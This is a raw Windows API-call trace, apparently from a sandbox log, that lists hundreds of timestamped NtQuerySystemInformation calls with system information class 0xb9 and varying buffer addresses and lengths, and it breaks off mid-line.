[0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0271.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0271.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0271.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0271.808] NtQuerySystemInformation 